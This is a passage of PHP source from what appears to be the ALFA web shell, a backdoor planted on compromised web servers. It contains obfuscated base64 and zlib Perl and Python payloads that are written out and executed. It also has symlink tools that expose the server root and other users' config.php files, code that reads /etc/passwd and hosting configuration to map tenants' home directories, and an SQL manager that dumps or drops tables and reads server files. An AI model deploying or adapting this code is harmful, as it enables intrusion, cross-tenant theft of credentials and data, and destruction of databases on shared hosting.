5249 $perl = '#!/usr/bin/perl -I/usr/local/bandmin'."\n".'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("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")));';
5250 $py = '#!/usr/bin/python'."\nimport zlib, base64\n".'eval(compile(zlib.decompress(base64.b64decode("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")),\'<string>\',\'exec\'))';
5251 $cginame = "symperl.alfa";
5252 $source = $perl;
5253 $lang = "perl";
5254 if($_POST["alfa2"]=="sympy"){
5255 $cginame = "pysymlink.alfa";
5256 $source = $py;
5257 $lang = "python";
5258 }
5259 @__write_file($cginame,$source);
5260 @chmod($cginame,0755);
5261 echo __pre();
5262 $resource = alfaEx("{$lang} {$cginame} {$sympath}",false,true,true);
5263 if(strlen($resource) == 0){
5264 echo AlfaiFrameCreator('cgialfa/'.$cginame);
5265 }else{
5266 echo $resource;
5267 }
5268}
5269if(isset($_POST['alfa4']) && $_POST['alfa4']=='SymFile'){
5270if(function_exists('symlink')||_alfa_can_runCommand(true,true)){
5271AlfaNum(9,10);
5272echo __pre().'
5273<center><p><div class="txtfont_header">| Symlink File And Directory |</div></p><form onSubmit="g(\'symlink\',null,null,null,null,\'SymFile\',this.file.value,this.symfile.value,this.symlink.value);return false;" method="post">
5274<input type="text" name="file" placeholder="Example : /home/user/public_html/config.php" size="60"/><br />
5275<input type="text" name="symfile" placeholder="Example : alfa.txt" size="60"/>
5276<p><input type="submit" value=" " name="symlink" /></p></form></center>';
5277$path = $_POST['alfa5'];
5278$symname = $_POST['alfa6'];
5279$solevisible58 = $_POST['alfa7'];
5280if($solevisible58){
5281$new_name = str_replace(".", "_", basename($symname));
5282$rand_dir = $new_name.rand(111,9999);
5283$sym_dir = 'alfasymlinkphp/'.$rand_dir.'/';
5284@mkdir($sym_dir, 0777, true);
5285alfacgihtaccess('sym', $sym_dir, $symname);
5286_alfa_symlink("$path","$sym_dir/$symname");
5287echo __pre();
5288echo '<center><b><font color="white">Click >> </font><a target="_blank" href="'.$sym_dir.'" ><b><font size="4">'.$symname.'</font></b></a></b></center>';
5289}
5290}else{echo "<center><pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";}
5291}
5292if(isset($_POST['alfa2']) && $_POST['alfa2']=='symphp'){
5293$cant_symlink = true;
5294if(function_exists('symlink')||_alfa_can_runCommand(false,false)){
5295@mkdir('alfasymlink',0777);
5296alfacgihtaccess('sym','alfasymlink/');
5297_alfa_symlink('/','alfasymlink/root');
5298$table_header = "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><table id='tbl_sympphp' align='center' width='40%' class='main' border='1'><td><span style='color:#FFFF01;'><b>*</span></b></td><td><span style='color:#00A220;'><b>Domains</span></b></td><td><span style='color:#FFFFFF;'><b>Users</span></b></td><td><span style='color:#FF0000;'><b>symlink</span></b></td>";
5299if(_alfa_file_exists("/etc/named.conf") && !_alfa_file_exists("/etc/virtual/domainowners") && _alfa_file_exists("/etc/valiases/")){
5300echo "<center>";
5301$lines = array();
5302$anony_domains = array();
5303$anonymous_users = array();
5304$f_black = array();
5305$error = false;
5306$anonymous = false;
5307$makepwd = "/home/{user}/public_html/";
5308$domains = alfaGetDomains();
5309$lines = $domains["lines"];
5310$state = $domains["state"];
5311$is_posix = function_exists("posix_getpwuid") && function_exists("fileowner");
5312$can_runcmd = _alfa_can_runCommand(false,false);
5313if(!$is_posix && !$can_runcmd){
5314 $anonymous = true;
5315 $anony_domains = $domains["lines"];
5316 $lines = _alfa_file('/etc/passwd');
5317}
5318echo $table_header;
5319$count=1;
5320$template = '<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="{http}"/><span style="color:#00A220;margin-left:10px;"><b>{domain}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{owner}</font></b></td><td><a href="alfasymlink/root{sympath}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>';
5321foreach($lines as $line){
5322 $domain = "";
5323 $owner = "";
5324 if($anonymous){
5325 $explode = explode(":", $line);
5326 $owner = $explode[0];
5327 $owner_len = strlen($owner) - 1;
5328 $userid = $explode[2];
5329 if((int)$userid < 500)continue;
5330 $domain = "[?????]";
5331 $temp_black = array();
5332 $finded = false;
5333 foreach($anony_domains as $anony){
5334 if($state == "named.conf"){
5335 if(@strstr($anony, 'zone')){
5336 preg_match_all('#zone "(.*)"#',$anony, $data);
5337 $domain = $data[1][0];
5338 }else{
5339 continue;
5340 }
5341 }elseif($state == "named" || $state == "valiases"){
5342 if($anony == "." || $anony == "..")continue;
5343 if($state == "named")$anony = rtrim($anony, ".db");
5344 $domain = $anony;
5345 }
5346 $sub_domain = str_replace(array("-","."), "", $domain);
5347 if(substr($owner, 0, $owner_len) == substr($sub_domain, 0, $owner_len)){
5348 if(in_array($owner.$domain, $temp_black))continue;
5349 $sympath = str_replace("{user}", $owner, $makepwd);
5350 $http = "http://".$domain;
5351 echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
5352 $count++;
5353 $temp_black[] = $owner.$domain;
5354 $finded = true;
5355 }
5356 }
5357 if(!$finded){
5358 $anonymous_users[] = $owner;
5359 }
5360 }else{
5361 if($state == "named.conf"){
5362 if(@strstr($line, 'zone')){
5363 preg_match_all('#zone "(.*)"#',$line, $data);
5364 $domain = $data[1][0];
5365 }else{
5366 continue;
5367 }
5368 }elseif($state == "named" || $state == "valiases"){
5369 if($line == "." || $line == "..")continue;
5370 if($state == "named")$line = rtrim($line, ".db");
5371 $domain = $line;
5372 }
5373 if(strlen(trim($domain)) > 2 && $state != "passwd"){
5374 if(!_alfa_file_exists('/etc/valiases/'.$domain, false))continue;
5375 if($is_posix){
5376 $user = @posix_getpwuid(@fileowner('/etc/valiases/'.$domain));
5377 $owner = $user["name"];
5378 }elseif($can_runcmd){
5379 $owner = alfaEx("stat -c '%U' /etc/valiases/".$domain,false,false);
5380 }
5381 }
5382 }
5383 if(!$anonymous){
5384 if(strlen($owner)==0 || in_array($owner.$domain, $f_black))continue;
5385 $sympath = str_replace("{user}", $owner, $makepwd);
5386 $http = "http://".$domain;
5387 if($state == "passwd"){
5388 $http = "javascript:alert('we cant find domain...')";
5389 }
5390 echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
5391 $count++;
5392 $f_black[] = $owner.$domain;
5393 }
5394}
5395if($anonymous){
5396 foreach($anonymous_users as $owner){
5397 $sympath = str_replace("{user}", $owner, $makepwd);
5398 $http = "javascript:alert('we cant find domain...')";
5399 echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, "[????]", $owner, $sympath), $template);
5400 $count++;
5401 }
5402}
5403$cant_symlink = false;
5404}else{
5405$is_direct = false;
5406$makepwd = alfaMakePwd();
5407if(_alfa_file_exists("/etc/virtual/domainowners")){
5408 $makepwd = "/home/{user}/public_html";
5409 $is_direct = true;
5410}
5411$sole = _alfa_file("/etc/virtual/domainowners");
5412$count=1;
5413echo $table_header;
5414$template = '<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="http://www.{url}"/><span style="color:#00A220;margin-left:10px;"><b>{url}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{user}</font></b></td><td><a href="alfasymlink/root{cwd}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>';
5415if($sole){
5416 foreach($sole as $visible){
5417 if(@strstr($visible,":")){
5418 $solevisible = explode(':', $visible);
5419 $cwd = str_replace("{user}", trim($solevisible[1]), $makepwd);
5420 echo str_replace(array("{count}","{user}","{url}","{cwd}"), array($count++, trim($solevisible[1]), trim($solevisible[0]), $cwd), $template);
5421 }
5422 }
5423}else{
5424 $passwd = _alfa_file("/etc/passwd");
5425 if($passwd){
5426 $html = "";
5427 $is_named = false;
5428 $users = array();
5429 $domains = array();
5430 $uknowns = array();
5431 foreach($passwd as $user){
5432 $user = trim($user);
5433 $expl = explode(":", $user);
5434 if((int)$expl[2] < 500)continue;
5435 $users[$expl[0]] = $expl[5];
5436 }
5437 $site_domains = @scandir("/etc/virtual/");
5438 if(!$site_domains){
5439 $site_domains = alfaEx("ls /etc/virtual/");
5440 $site_domains = explode("\n", $site_domains);
5441 if(!$site_domains){
5442 $site_domains = _alfa_file("/etc/named.conf");
5443 if($site_domains){$is_named = true;}
5444 }
5445 }
5446 foreach($site_domains as $line){
5447 if($is_named){
5448 if(@strstr($line, 'zone')){
5449 preg_match_all('#zone "(.*)"#',$line, $data);
5450 $domain = $data[1][0];
5451 if(strlen($domain > 2) && !empty($domain)){
5452 $domains[] = $domain;
5453 }
5454 }
5455 }else{
5456 $domains[] = $line;
5457 }
5458 }
5459 $x = 1;
5460 foreach($users as $user => $home){
5461 foreach($domains as $domain){
5462 $user_len = strlen($user) - 1;
5463 $sub_domain = str_replace(array("-","."), "", $domain);
5464 $five_user = substr($user, 0,$user_len);
5465 $five_domain = substr($sub_domain, 0,$user_len);
5466 if($five_user == $five_domain){
5467 if($is_direct){
5468 $cwd = str_replace("{user}", $user, $makepwd);
5469 }else{
5470 $expl = explode("}/", $makepwd);
5471 $cwd = $home."/".$expl[1];
5472 }
5473 $html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, $domain, $cwd), $template);
5474 }else{
5475 $uknowns[$user] = $home;
5476 }
5477 }
5478 }
5479 $uknowns = array_unique($uknowns);
5480 foreach($uknowns as $user => $home){
5481 if($is_direct){
5482 $cwd = str_replace("{user}", $user, $makepwd);
5483 }else{
5484 $expl = explode("}/", $makepwd);
5485 $cwd = $home."/".$expl[1];
5486 }
5487 $html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, "[?????]", $cwd), $template);
5488 }
5489 echo($html);
5490 }
5491}
5492echo "</table>";
5493$cant_symlink = false;
5494}
5495}else{
5496 echo "<pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";
5497 $cant_symlink = false;
5498}
5499if($cant_symlink)echo '<pre id="strOutput" style="margin-top:5px" class="ml1"><br><font color="#FFFFFF">Error...</font></b><br>';
5500echo "</center></table>";
5501}
5502echo "</div>";
5503alfafooter();
5504}
5505function alfasql(){
5506class DbClass{
5507public $type;
5508public $link;
5509public $res;
5510public $mysqli_connect_error = false;
5511public $mysqli_connect_error_msg = "";
5512function __construct($type){
5513$this->type = $type;
5514}
5515function connect($host, $user, $pass, $dbname){
5516switch($this->type){
5517case 'mysql':
5518if($this->link = @mysqli_connect($host,$user,$pass,$dbname)){
5519 return true;
5520}else{
5521 $this->mysqli_connect_error = true;
5522 $this->mysqli_connect_error_msg = mysqli_connect_error();
5523 return false;
5524}
5525break;
5526case 'pgsql':
5527$host = explode(':', $host);
5528if(!$host[1]) $host[1]=5432;
5529if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
5530break;
5531}
5532return false;
5533}
5534function selectdb($db){
5535switch($this->type){
5536case 'mysql':
5537if(@mysqli_select_db($db))return true;
5538break;
5539}
5540return false;
5541}
5542function query($str){
5543switch($this->type){
5544case 'mysql':
5545return $this->res = @mysqli_query($this->link,$str);
5546break;
5547case 'pgsql':
5548return $this->res = @pg_query($this->link,$str);
5549break;
5550}
5551return false;
5552}
5553function fetch(){
5554$res = func_num_args()?func_get_arg(0):$this->res;
5555switch($this->type){
5556case 'mysql':
5557return @mysqli_fetch_assoc($res);
5558break;
5559case 'pgsql':
5560return @pg_fetch_assoc($res);
5561break;
5562}
5563return false;
5564}
5565function listDbs(){
5566switch($this->type){
5567case 'mysql':
5568return $this->query("SHOW databases");
5569break;
5570case 'pgsql':
5571return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
5572break;
5573}
5574return false;
5575}
5576function listTables(){
5577switch($this->type){
5578case 'mysql':
5579return $this->res = $this->query('SHOW TABLES');
5580break;
5581case 'pgsql':
5582return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
5583break;
5584}
5585return false;
5586}
5587function error(){
5588switch($this->type){
5589case 'mysql':
5590return @mysqli_error($this->link);
5591break;
5592case 'pgsql':
5593return @pg_last_error();
5594break;
5595}
5596return false;
5597}
5598function setCharset($str){
5599switch($this->type){
5600case 'mysql':
5601if(function_exists('mysql_set_charset'))
5602return @mysqli_set_charset($this->link,$str);
5603else
5604$this->query('SET CHARSET '.$str);
5605break;
5606case 'pgsql':
5607return @pg_set_client_encoding($this->link, $str);
5608break;
5609}
5610return false;
5611}
5612function loadFile($str){
5613switch($this->type){
5614case 'mysql':
5615return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
5616break;
5617case 'pgsql':
5618$this->query("CREATE TABLE solevisible(file text);COPY solevisible FROM '".addslashes($str)."';select file from solevisible;");
5619$r=array();
5620while($i=$this->fetch())
5621$r[] = $i['file'];
5622$this->query('drop table solevisible');
5623return array('file'=>implode("\n",$r));
5624break;
5625}
5626return false;
5627}
5628function dump($table, $fp = false){
5629switch($this->type){
5630case 'mysql':
5631$res = $this->query('SHOW CREATE TABLE `'.$table.'`');
5632$create = mysqli_fetch_array($res);
5633$sql = $create[1].";\n";
5634if($fp) fwrite($fp, $sql); else echo($sql);
5635$this->query('SELECT * FROM `'.$table.'`');
5636$head = true;
5637while($item = $this->fetch()){
5638$columns = array();
5639foreach($item as $k=>$v) {
5640if($v == null)
5641$item[$k] = "''";
5642elseif(is_numeric($v))
5643$item[$k] = $v;
5644else
5645$item[$k] = "'".@mysqli_real_escape_string($this->link, $v)."'";
5646$columns[] = "`".$k."`";
5647}
5648if($head) {
5649$sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
5650$head = false;
5651} else
5652$sql = "\n\t,(".implode(", ", $item).')';
5653if($fp) fwrite($fp, $sql); else echo($sql);
5654}
5655if(!$head)
5656if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
5657break;
5658case 'pgsql':
5659$this->query('SELECT * FROM '.$table);
5660while($item = $this->fetch()) {
5661$columns = array();
5662foreach($item as $k=>$v) {
5663$item[$k] = "'".addslashes($v)."'";
5664$columns[] = $k;
5665}
5666$sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
5667if($fp) fwrite($fp, $sql); else echo($sql);
5668}
5669break;
5670}
5671return false;
5672}
5673};
5674$db = new DbClass($_POST['type']);
5675if(@$_POST['alfa1']=='dumpfile'||@$_POST['alfa1']=='droptbl'){
5676$db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
5677$db->selectdb($_POST['sql_base']);
5678switch($_POST['charset']){
5679case "Windows-1251": $db->setCharset('calfa1251'); break;
5680case "UTF-8": $db->setCharset('utf8'); break;
5681case "KOI8-R": $db->setCharset('koi8r'); break;
5682case "KOI8-U": $db->setCharset('koi8u'); break;
5683case "calfa866": $db->setCharset('calfa866'); break;
5684}
5685$json = json_decode($_POST['alfa2'],true);
5686if(count($json['tbl'])>0){
5687if($_POST['alfa1']=='dumpfile'){
5688if($fp = @fopen($json['file'],'w')){
5689foreach($json['tbl'] as $v)$db->dump($v, $fp);
5690fclose($fp);
5691$dumpStatus = true;
5692}}else{
5693foreach($json['tbl'] as $v)$db->query('DROP TABLE '.$v);
5694}
5695}
5696unset($_POST['alfa2']);
5697}
5698alfahead();
5699$form_visibility = "table";
5700if(isset($_POST['sql_host'])){
5701 $connection_db = $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
5702 if($connection_db && !empty($_POST['sql_base'])){
5703 $form_visibility = "none";
5704 }
5705}
5706echo "
5707<div class='header' style='min-height:300px;'>".($form_visibility!="none"?"<center><div class='txtfont_header'>| Sql Manager |</div><p>".getConfigHtml('all')."</p></center>":"")."<div style='text-align:center;margin-bottom: 10px;'><button class='connection-his-btn db-opt-id' onclick='alfaShowConnectionHistory(this);' mode='on'>Connection History</button><div class='connection_history_holder'></div></div>
5708<form name='sf' class='db-opt-id' method='post' onsubmit='fs(this,null,this);return false;'><table style='margin: 0 auto;' cellpadding='2' cellspacing='0'><tr>
5709<td><div class=\"txtfont\">TYPE</div></td><td><div class=\"txtfont\">HOST</div></td><td><div class=\"txtfont\">DB USER</div></td><td><div class=\"txtfont\">DB PASS</div></td><td><div class=\"txtfont\">DB NAME</div></td><td></td></tr><tr>
5710<input type='hidden' name='a' value=Sql><input type='hidden' name='alfa1' value='query'><input type='hidden' name='alfa2' value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'UTF-8') ."'>
5711<td><select name='type'><option value='mysql' ";
5712if(@$_POST['type']=='mysql')echo 'selected';
5713echo ">MySql</option><option value='pgsql' ";
5714if(@$_POST['type']=='pgsql')echo 'selected';
5715echo ">PostgreSql</option></select></td>
5716<td><input type='text' name='sql_host' id='db_host' value='". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td>
5717<td><input type='text' name='sql_login' id='db_user' value='". (empty($_POST['sql_login'])?'':htmlspecialchars($_POST['sql_login'])) ."'></td>
5718<td><input type='text' name='sql_pass' id='db_pw' value='". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";
5719$tmp = "<input type='text' name='sql_base' id='db_name' value='". (empty($_POST['sql_base'])?'':htmlspecialchars($_POST['sql_base'])) ."'>";
5720if(isset($_POST['sql_host'])){
5721if($connection_db){
5722switch($_POST['charset']){
5723case "Windows-1251": $db->setCharset('calfa1251'); break;
5724case "UTF-8": $db->setCharset('utf8'); break;
5725case "KOI8-R": $db->setCharset('koi8r'); break;
5726case "KOI8-U": $db->setCharset('koi8u'); break;
5727case "calfa866": $db->setCharset('calfa866'); break;
5728}
5729$db->setCharset('utf8');
5730$db->listDbs();
5731echo "<select name=sql_base><option value=''></option>";
5732while($item = $db->fetch()) {
5733list($key, $value) = each($item);
5734echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
5735}
5736echo '</select>';
5737}else{
5738 echo $tmp;
5739}
5740}else
5741echo $tmp;
5742$curr_mysql_id = $_POST['current_mysql_id'];
5743echo "</td>
5744<td><input type='submit' value=' '></td>
5745<td><input type='checkbox' name='sql_count' value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> <div class=\"txtfont\">count the number of rows</div></td>
5746</tr>
5747</table>";
5748if($db->mysqli_connect_error){
5749 echo '<div style="text-align: center;font-size: 17px;margin-top: 18px;">'.$db->mysqli_connect_error_msg.'</div>';
5750}
5751if(!empty($curr_mysql_id)){
5752 $sql_title_db = "";
5753 if(!empty($_POST['sql_base'])){
5754 $sql_title_db = "d.querySelector('#tab_".$curr_mysql_id." span').innerHTML='".addslashes($_POST['sql_base'])."';";
5755 }
5756 echo "<script>mysql_cache['".$curr_mysql_id."']['host']='".addslashes($_POST['sql_host'])."';mysql_cache['".$curr_mysql_id."']['user']='".addslashes($_POST['sql_login'])."';mysql_cache['".$curr_mysql_id."']['pass']='".addslashes($_POST['sql_pass'])."';mysql_cache['".$curr_mysql_id."']['db']='".addslashes($_POST['sql_base'])."';mysql_cache['".$curr_mysql_id."']['charset']='".addslashes($_POST['charset'])."';mysql_cache['".$curr_mysql_id."']['type']='".addslashes($_POST['type'])."';mysql_cache['".$curr_mysql_id."']['count']='".addslashes($_POST['sql_count'])."';".$sql_title_db."alfaConnectionHistoryUpdate();</script>";
5757}
5758if(isset($db) && $db->link){
5759echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
5760if(!empty($_POST['sql_base'])){
5761$db->selectdb($_POST['sql_base']);
5762echo "<tr><td width=1 style='border-top:2px solid #666;vertical-align:top;'><div class='txtfont'>Tables:</div><br><br>";
